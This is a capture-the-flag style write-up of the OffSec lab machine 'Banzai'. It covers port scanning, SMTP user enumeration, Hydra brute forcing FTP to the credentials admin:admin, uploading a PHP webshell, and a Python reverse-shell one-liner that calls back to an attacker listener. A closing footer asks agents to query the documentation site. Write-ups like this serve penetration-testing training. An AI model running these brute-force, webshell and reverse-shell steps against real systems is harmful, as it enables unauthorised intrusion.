# Banzai (WIP) ## Nmap ``` sudo nmap 192.168.233.56 -p- -sS -sV PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) 25/tcp open smtp Postfix smtpd 5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17 8080/tcp open http Apache httpd 2.4.25 8295/tcp open http Apache httpd 2.4.25 ((Debian)) Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` SMTP is open on the host. Bruteforcing `smtp-user-enum` reveals the following: ``` sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.233.56 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-694748f9446322a5694af1a5a1894820dc251b55%2Fimage.png?alt=media) The user admin is not a default user on Linux / Unix systems. We can attempt to bruteforce this against relevant services starting with FTP. We receive no hits with Hydra after 30 minutes. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4560ce03151253793d49be59f50ceb707a4615cd%2Fimage.png?alt=media) However, trying with the mirai password list provides success on `admin:admin`. ``` hydra -l admin -P /usr/share/wordlists/metasploit/mirai_pass.txt ftp://192.168.233.56 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a22807f3d43bedc587ea477fe450d9621c433a53%2Fimage.png?alt=media) Logging in with FTP appears to show the root directory for the webserver. Knowing this we can upload a reverse shell. A PHP shell will be sufficiant as we can tell from the listing PHP is supported. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c585ee2a7b990b2a656cd541a003c98cf1719a36%2Fimage.png?alt=media) Using the PUT command we can upload a webshell then browse to it to access: ![http://192.168.233.56:8295/webshell.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c9640adefef8279c1dd91cf028a8ab14d3249d3%2Fimage.png?alt=media) A Python reverse shell was then executed on the webshell pointing back to a listener on port 21 to gain a full shell. ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.233",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-012da867c7664d91cb31c75a25e8c6063cd73ac8%2Fimage.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/to-do/banzai.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.